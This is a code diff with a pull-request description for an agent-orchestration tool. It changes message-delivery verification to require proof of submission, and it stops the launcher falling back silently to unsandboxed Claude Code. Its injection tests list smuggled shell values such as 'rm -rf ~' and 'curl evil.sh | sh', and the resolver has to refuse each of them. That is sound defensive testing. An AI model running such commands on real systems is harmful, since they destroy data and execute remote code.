-  if (selectedProgram !== 'none' && selectedProgram !== 'terminal') {
-    let startCommand = ''
-    if (selectedProgram.includes('claude')) startCommand = 'claude'
-    else if (selectedProgram.includes('codex')) startCommand = 'codex'
-    else if (selectedProgram.includes('aider')) startCommand = 'aider'
-    else if (selectedProgram.includes('cursor')) startCommand = 'cursor'
-    else if (selectedProgram.includes('gemini')) startCommand = 'gemini'
-    else if (selectedProgram.includes('opencode')) startCommand = 'opencode'
-    else if (selectedProgram.includes('openclaw')) startCommand = 'openclaw'
-    else startCommand = 'claude'
+  // Launch program.
+  //
+  // Shares lib/program-command with the wake path — this used to be a second,
+  // slightly different copy of the same ladder, with the same `else 'claude'`
+  // default that turns an unrecognised or broken wrapper into a bare,
+  // unsandboxed Claude Code.
+  const selectedProgram = program || 'claude-code'
+  if (!isNoProgram(selectedProgram)) {
+    const resolved = resolveProgramCommand(selectedProgram)
+    if (!resolved.command) {
+      console.error(`[Sessions] Not launching a program in ${actualSessionName}: ${resolved.error}`)
+    } else {
+      let startCommand = resolved.command
 
-    if (programArgs && typeof programArgs === 'string') {
-      const sanitized = programArgs.replace(/[^a-zA-Z0-9\s\-_.=/:,~@]/g, '').trim()
-      if (sanitized) startCommand = `${startCommand} ${sanitized}`
-    }
+      if (programArgs && typeof programArgs === 'string') {
+        const sanitized = programArgs.replace(/[^a-zA-Z0-9\s\-_.=/:,~@]/g, '').trim()
+        if (sanitized) startCommand = `${startCommand} ${sanitized}`
+      }
 
-    await new Promise(resolve => setTimeout(resolve, 300))
+      await new Promise(resolve => setTimeout(resolve, 300))
 
-    try {
-      await runtime.sendKeys(actualSessionName, `"${startCommand}"`, { enter: true })
-      console.log(`[Sessions] Launched program "${startCommand}" in session ${actualSessionName}`)
-    } catch (progError) {
-      console.warn(`[Sessions] Could not launch program in ${actualSessionName}:`, progError)
+      try {
+        await runtime.sendKeys(actualSessionName, `"${startCommand}"`, { enter: true })
+        console.log(`[Sessions] Launched program "${startCommand}" in session ${actualSessionName}`)
+      } catch (progError) {
+        console.warn(`[Sessions] Could not launch program in ${actualSessionName}:`, progError)
+      }
     }
   }
 

--- a/tests/notification-service.test.ts
+++ b/tests/notification-service.test.ts
@@ -231,3 +231,63 @@ describe('notifyAgent — pane readback', () => {
     expect(mockRuntime.sendKeys).not.toHaveBeenCalled()
   })
 })
+
+/**
+ * Staged text — the state that had eight of nine agents on one host deaf while
+ * every indicator read green.
+ *
+ * `capture-pane` shows the input box, so the old readback (needle anywhere on
+ * the pane) was satisfied by text that had been typed and never submitted. The
+ * pane adapter returned `confirmed`, which additionally suppressed the retry
+ * that would have rescued it.
+ */
+describe('notifyAgent — text staged in the input box', () => {
+  /** The ref is sitting in the input box, never accepted. */
+  function stagedPane(messageId: string) {
+    return `  earlier output\n╭────────╮\n│ > [#${messageRef(messageId)}] [MESSAGE] From: sender - deploy failed\n╰────────╯`
+  }
+
+  it('does NOT report verified when the message is only staged', async () => {
+    mockRuntime.capturePane.mockResolvedValue(stagedPane(BASE.messageId))
+    const res = await notifyAgent(BASE)
+    expect(res.verified).toBeFalsy()
+    expect(res.notified).toBe(false)
+  })
+
+  it('names the failure precisely, so the log points the right way', async () => {
+    // "Not seen in pane" would send whoever reads it looking for the opposite
+    // problem. The message IS on the pane — that is the point.
+    mockRuntime.capturePane.mockResolvedValue(stagedPane(BASE.messageId))
+    const res = await notifyAgent(BASE)
+    expect(res.reason).toMatch(/staged/i)
+  })
+
+  it('clears the input box before retyping, rather than sending Enter again', async () => {
+    // Measured in the field: Enter once fails, Enter twice fails,
+    // clear-and-retype then Enter succeeds 7 of 7. Typing on top of staged text
+    // just produces a doubled line.
+    mockRuntime.capturePane.mockResolvedValue(stagedPane(BASE.messageId))
+    await notifyAgent(BASE)
+    const keys = mockRuntime.sendKeys.mock.calls.map((c: any[]) => c[1])
+    expect(keys).toContain('C-u')
+    // and the clear comes before the second attempt's text
+    const clearAt = keys.indexOf('C-u')
+    const textAfter = keys.slice(clearAt).filter((k: string) => k.includes('[MESSAGE]'))
+    expect(textAfter.length).toBeGreaterThan(0)
+  })
+
+  it('does not clear on the FIRST attempt — nothing is staged yet', async () => {
+    mockRuntime.capturePane.mockResolvedValue(paneWith(BASE.messageId))
+    await notifyAgent(BASE)
+    expect(mockRuntime.sendKeys.mock.calls.map((c: any[]) => c[1])).not.toContain('C-u')
+  })
+
+  it('still reports verified when a resend is accepted after staging', async () => {
+    // First attempt stages; the clear-and-retype gets through.
+    mockRuntime.capturePane
+      .mockResolvedValueOnce(stagedPane(BASE.messageId))
+      .mockResolvedValue(paneWith(BASE.messageId))
+    const res = await notifyAgent(BASE)
+    expect(res.verified).toBe(true)
+  })
+})

--- a/tests/pane-staged-text.test.ts
+++ b/tests/pane-staged-text.test.ts
@@ -1,0 +1,112 @@
+/**
+ * Tests for the defect that made "green" mean nothing: text typed into an
+ * agent and never submitted reads back off the pane exactly like text the
+ * agent received.
+ *
+ * Field report (3Metas, ~50 agents): eight of nine agents on one host held
+ * staged, unsubmitted text. One had been deaf about eleven hours. Seven were
+ * recoverable wake nudges — the mail was still in the inbox — but one was a
+ * real instruction with no inbox copy, and it was simply lost. Throughout,
+ * stop_reason=end_turn, clean turn durations, lastActive moving from the
+ * heartbeat. Every indicator green while the agent could not hear.
+ *
+ * `capture-pane` includes the input box, and the readback check looked for the
+ * message ANYWHERE on the pane, so staged text satisfied it and the pane
+ * adapter returned `confirmed` — which also suppressed the retry that would
+ * have rescued it.
+ *
+ * Proof of delivery has to be proof of SUBMISSION: the message must appear
+ * above the input box, where a TUI echoes what it accepted.
+ */
+
+import { describe, it, expect } from 'vitest'
+import { splitPaneAtInput, paneSubmitted, paneStaged } from '@/lib/notification-service'
+
+const REF = '[#3bk2096t]'
+
+/** Claude Code after the prompt was accepted: it is in the transcript, box empty. */
+const SUBMITTED = `
+> ${REF} [MESSAGE] From: alice - deploy failed
+
+  I'll take a look at that now.
+
+╭──────────────────────────────────────╮
+│ >                                    │
+╰──────────────────────────────────────╯
+`
+
+/** The failure: the text sits in the input box, unsubmitted. */
+const STAGED = `
+  Previous turn output here.
+
+╭──────────────────────────────────────╮
+│ > ${REF} [MESSAGE] From: alice - deploy failed
+╰──────────────────────────────────────╯
+`
+
+describe('splitPaneAtInput', () => {
+  it('splits at the last prompt line', () => {
+    const { accepted, input } = splitPaneAtInput(STAGED)
+    expect(input).toContain(REF)
+    expect(accepted).not.toContain(REF)
+  })
+
+  it('treats the whole pane as accepted when there is no prompt line', () => {
+    const pane = 'just some output\nwith no prompt'
+    const { accepted, input } = splitPaneAtInput(pane)
+    expect(accepted).toBe(pane)
+    expect(input).toBe('')
+  })
+
+  it('uses the LAST prompt, not the first', () => {
+    // A transcript is full of earlier prompt lines; only the bottom one is the
+    // live input box.
+    const pane = `> old message one\n> old message two\n╭───╮\n│ > staged text\n╰───╯`
+    expect(splitPaneAtInput(pane).input).toContain('staged text')
+    expect(splitPaneAtInput(pane).accepted).toContain('old message two')
+  })
+})
+
+describe('paneSubmitted — proof of submission, not of presence', () => {
+  it('is true when the message is above the input box', () => {
+    expect(paneSubmitted(SUBMITTED, REF)).toBe(true)
+  })
+
+  it('is FALSE when the message is only staged in the input box', () => {
+    // The whole bug in one assertion: the old check was `pane.includes(ref)`,
+    // which is true here, and returning confirmed for this state is what left
+    // eight agents deaf while reporting healthy.
+    expect(paneSubmitted(STAGED, REF)).toBe(false)
+  })
+
+  it('is false when the message is not on the pane at all', () => {
+    expect(paneSubmitted('unrelated output\n> ', REF)).toBe(false)
+  })
+
+  it('survives the pane hard-wrapping the ref mid-token', () => {
+    const wrapped = `> [#3bk20\n96t] [MESSAGE] From: alice\n╭───╮\n│ > \n╰───╯`
+    expect(paneSubmitted(wrapped, REF)).toBe(true)
+  })
+})
+
+describe('paneStaged — positive evidence of NON-delivery', () => {
+  it('is true when our text is sitting in the input box', () => {
+    expect(paneStaged(STAGED, REF)).toBe(true)
+  })
+
+  it('is false once the text has been accepted', () => {
+    expect(paneStaged(SUBMITTED, REF)).toBe(false)
+  })
+
+  it('recognises a bare shell prompt holding the text', () => {
+    // Not every pane is a TUI. A shell with the echo wrapper typed but not run
+    // is the same failure wearing different chrome.
+    const shell = `$ ls\nfile.txt\n$ echo '${REF} [MESSAGE] From: alice'`
+    expect(paneStaged(shell, REF)).toBe(true)
+    expect(paneSubmitted(shell, REF)).toBe(false)
+  })
+
+  it('recognises a ❯ prompt', () => {
+    expect(paneStaged(`❯ ${REF} hello`, REF)).toBe(true)
+  })
+})

--- a/tests/program-command.test.ts
+++ b/tests/program-command.test.ts
@@ -1,0 +1,148 @@
+/**
+ * Tests for lib/program-command.ts.
+ *
+ * Field report (3Metas): one agent reads untrusted external mail and had to run
+ * inside `sandbox-exec`, but `program` accepted only a fixed list of names, so
+ * it could not point at a wrapper script. The workaround was to wake with
+ * `startProgram:false` and launch the wrapped program by hand — which holds
+ * until the next ordinary wake starts the program UNSANDBOXED with nothing to
+ * warn anyone. They built a detector because they could not build a preventer.
+ *
+ * The second half is worse than the first: the old ladder ended in
+ * `return 'claude'`, so any value it did not recognise silently became bare
+ * Claude Code — the exact outcome that must not happen for a sandboxed agent.
+ */
+
+import { describe, it, expect, beforeAll, afterAll } from 'vitest'
+import fs from 'fs'
+import os from 'os'
+import path from 'path'
+import { resolveProgramCommand, isNoProgram } from '@/lib/program-command'
+
+let dir: string
+let wrapper: string
+let claudeWrapper: string
+let notExecutable: string
+
+beforeAll(() => {
+  dir = fs.mkdtempSync(path.join(os.tmpdir(), 'progcmd-'))
+  wrapper = path.join(dir, 'sandboxed-agent.sh')
+  claudeWrapper = path.join(dir, 'claude-sandboxed.sh')
+  notExecutable = path.join(dir, 'not-executable.sh')
+  for (const f of [wrapper, claudeWrapper]) {
+    fs.writeFileSync(f, '#!/bin/sh\nexec sandbox-exec -f profile.sb claude "$@"\n')
+    fs.chmodSync(f, 0o755)
+  }
+  fs.writeFileSync(notExecutable, '#!/bin/sh\n')
+  fs.chmodSync(notExecutable, 0o644)
+})
+
+afterAll(() => fs.rmSync(dir, { recursive: true, force: true }))
+
+describe('known program names', () => {
+  it.each([
+    ['claude-code', 'claude'],
+    ['Claude Code', 'claude'],
+    ['codex', 'codex'],
+    ['aider', 'aider'],
+    ['cursor', 'cursor'],
+    ['gemini', 'gemini'],
+    ['opencode', 'opencode'],
+    ['openclaw', 'openclaw'],
+  ])('resolves %s to %s', (program, expected) => {
+    expect(resolveProgramCommand(program).command).toBe(expected)
+  })
+
+  it('is case-insensitive, as the registry holds both spellings', () => {
+    // The live registry has 75 "claude-code" and 8 "Claude Code".
+    expect(resolveProgramCommand('Claude Code').kind).toBe('claude')
+  })
+})
+
+describe('wrapper scripts', () => {
+  it('accepts an absolute path to an executable', () => {
+    expect(resolveProgramCommand(wrapper).command).toBe(wrapper)
+  })
+
+  it('classifies a claude-named wrapper as claude, so it keeps claude flags', () => {
+    // Losing --permission-mode on a sandboxed agent would be a silent
+    // downgrade of exactly the agent that needs it most.
+    expect(resolveProgramCommand(claudeWrapper).kind).toBe('claude')
+  })
+
+  it('classifies a non-claude wrapper as a plain wrapper', () => {
+    expect(resolveProgramCommand(wrapper).kind).toBe('wrapper')
+  })
+
+  it('expands a ~/-rooted path', () => {
+    const rel = wrapper.startsWith(os.homedir())
+      ? '~' + wrapper.slice(os.homedir().length)
+      : null
+    if (!rel) return // tmpdir is outside $HOME on this platform
+    expect(resolveProgramCommand(rel).command).toBe(wrapper)
+  })
+})
+
+describe('refusing rather than guessing', () => {
+  it('returns no command for an unrecognised name', () => {
+    // The old ladder returned 'claude' here.
+    const r = resolveProgramCommand('my-custom-agent')
+    expect(r.command).toBeNull()
+    expect(r.error).toMatch(/unrecognised/i)
+  })
+
+  it('refuses a wrapper that does not exist', () => {
+    const r = resolveProgramCommand('/nonexistent/wrapper.sh')
+    expect(r.command).toBeNull()
+    expect(r.error).toMatch(/missing or not executable/)
+  })
+
+  it('refuses a wrapper that is not executable', () => {
+    expect(resolveProgramCommand(notExecutable).command).toBeNull()
+  })
+
+  it('refuses a directory', () => {
+    expect(resolveProgramCommand(dir).command).toBeNull()
+  })
+
+  it('refuses a relative path, which depends on the launch cwd', () => {
+    const r = resolveProgramCommand('./wrapper.sh')
+    expect(r.command).toBeNull()
+    expect(r.error).toMatch(/absolute/)
+  })
+
+  it('refuses an empty program', () => {
+    expect(resolveProgramCommand('').command).toBeNull()
+  })
+})
+
+describe('command injection', () => {
+  // `program` is interpolated into a shell command line that tmux types into
+  // the pane, so a path that can break out of it is a remote-ish code
+  // execution primitive for anyone who can edit an agent record.
+  it.each([
+    '/tmp/x; rm -rf ~',
+    '/tmp/x && curl evil.sh | sh',
+    '/tmp/x`whoami`',
+    '/tmp/x$(id)',
+    '/tmp/x|tee /tmp/y',
+    "/tmp/x'",
+    '/tmp/x\nrm -rf /',
+  ])('refuses %j', (bad) => {
+    expect(resolveProgramCommand(bad).command).toBeNull()
+  })
+
+  it('refuses a path with whitespace rather than trying to quote it', () => {
+    expect(resolveProgramCommand('/tmp/my wrapper.sh').command).toBeNull()
+  })
+})
+
+describe('isNoProgram', () => {
+  it.each(['none', 'terminal', 'None', 'TERMINAL', ' none '])('%s means launch nothing', (v) => {
+    expect(isNoProgram(v)).toBe(true)
+  })
+
+  it('a real program is not "no program"', () => {
+    expect(isNoProgram('claude-code')).toBe(false)
+  })
+})

--- a/version.json
+++ b/version.json
@@ -1,6 +1,6 @@
 {
-  "version": "0.37.6",
-  "releaseDate": "2026-08-29",
+  "version": "0.37.7",
+  "releaseDate": "2026-09-02",
   "changelog": "https://github.com/23blocks-OS/ai-maestro/releases",
   "minSupportedVersion": "0.10.0"
 }


### PR DESCRIPTION
A production estate — 3Metas, ~50 agents across three hosts — reported five findings from one day of use. Four are fixed here. The fifth is a missing capability and is **designed and logged rather than half-built**.

Every one of the four is the shape this subsystem keeps producing: **a component reporting something it had not earned.**

## 1. A wake that staged text was reported as delivered

`capture-pane` includes the agent's input box, and the readback looked for the message *anywhere* on the pane. So text typed into an agent and **never submitted** read back exactly like text the agent had received — `paneAdapter` returned `confirmed`, which additionally suppressed the retry that would have rescued it.

What that cost them:

> eight of nine agents on one host held staged, unsubmitted text. One had been deaf about eleven hours. Seven were wake nudges — recoverable, the mail was still in the inbox. **One was a real instruction with no inbox copy. It was simply lost.**

`stop_reason=end_turn`, clean turn durations, `lastActive` still moving from the heartbeat. Every indicator green while the agent was deaf.

Proof of delivery is now proof of **submission**: the message must appear *above* the input box, where a TUI echoes what it accepted. Text still in the box is reported as `staged` — positive evidence of non-delivery, which is strictly stronger than "unknown" — and routed to the retry queue that a false `confirmed` had been suppressing.

## 2. Recovery clears before retyping

Their measurement, which is what makes this fixable rather than guessable:

| form | result |
|---|---|
| Enter once | fails |
| Enter twice | fails |
| **clear-and-retype, then Enter** | **7 of 7** |

Typing on top of staged text just produces a doubled line. Resends now send `C-u` first.

## 3. `failed`, not `unavailable`

The pane route reports `failed` when it typed and the text did not take. `unavailable` means *this route does not apply* — using it for a route that applied and failed hides a real fault behind a phrase that reads as nothing to see here.

## 4. An unrecognised `program` no longer becomes bare Claude Code

`resolveStartCommand` ended in `return 'claude'`. That is the worst available default: the one configuration that must **never** launch bare — a `sandbox-exec` wrapper for an agent reading untrusted mail — is exactly what an unrecognised name produced.

New `lib/program-command.ts` returns an error and **refuses to launch**; the wake reports `programStarted: false` with the reason. It also collapses a second, slightly different copy of the same ladder that lived in the session-create path.

Checked against the live registry before changing it: 75 `claude-code`, 8 `Claude Code`, 1 `none`, 1 unset — all still resolve.

## Added: wrapper scripts as `program`

They needed one agent inside `sandbox-exec`. `program` was a closed whitelist, so the only route was `startProgram:false` plus a manual launch — which holds until the next ordinary wake starts the program **unsandboxed, with nothing to warn anyone**. They built a detector because they could not build a preventer.

`program` now accepts an absolute path to an executable, validated (exists, executable, no shell metacharacters, no whitespace — it is interpolated into a shell command line). A wrapper whose basename contains `claude` is treated as Claude Code for flags, so it keeps `--permission-mode`, telemetry and `--channels`; losing `--permission-mode` on a sandboxed agent would be a silent downgrade of the very agent that needs it.

## Added: `channel-wake` startup diagnostic

On both of their hosts `~/.aimaestro/channels/` did not exist. Not empty — **absent**. No agent had ever used the reliable route.

Nothing was broken and nothing lied: the adapter reports `unavailable` and delivery correctly proceeds down the chain. That is *why* nobody noticed. Startup now states how many online agents have a channel, how many are proven by ack, and which precondition is missing — including whether `AIMAESTRO_CHANNEL_FLAG` is set at all.

## Not fixed: agents cannot run as separate OS users

`docs/BACKLOG.md` #20, with the full design.

Every agent runs as whoever started the server, so a per-repo deploy key protects nothing at the filesystem level — `git` refused their agent access to a repository it then read as a plain directory. No `user`/`uid`/`runAs` field exists anywhere: a missing capability, not a misconfiguration.

The fix crosses a privilege boundary — sudoers per agent user, per-user tmux sockets, per-user `$HOME` and AMP home, ~50 existing agents to migrate, two production hosts that differ in all of it. **A `runAs` field that appears to isolate and does not would be precisely the defect class this entire PR is about.** So it is designed, not shipped. The new wrapper support is a real interim mitigation for the untrusted-input case.

## Upstream, not in this release

Their **first-ranked** finding is a separate repo: [agentmessaging/claude-plugin#26](https://github.com/agentmessaging/claude-plugin/pull/26), open and green. A read command rewrote the identity of the agent it read.

> It changes the system while appearing to observe it, and it cannot be audited around, because the audit is what causes it. An Agents Manager sweeping 36 identities to check for corruption would have renamed all 36 to its own name in about four seconds.

That fix reaches the hosts only after #26 merges and the plugin is rebuilt.

## Tests

**1066 passing**, up from 1017.

- 11 pinning submitted-vs-staged (`tests/pane-staged-text.test.ts`)
- 5 for the staged recovery flow
- 33 for the program resolver, including command-injection refusals

Upstream adds 11 bats tests, **9 of which fail against the previous code**.

🤖 Generated with [Claude Code](https://claude.com/claude-code)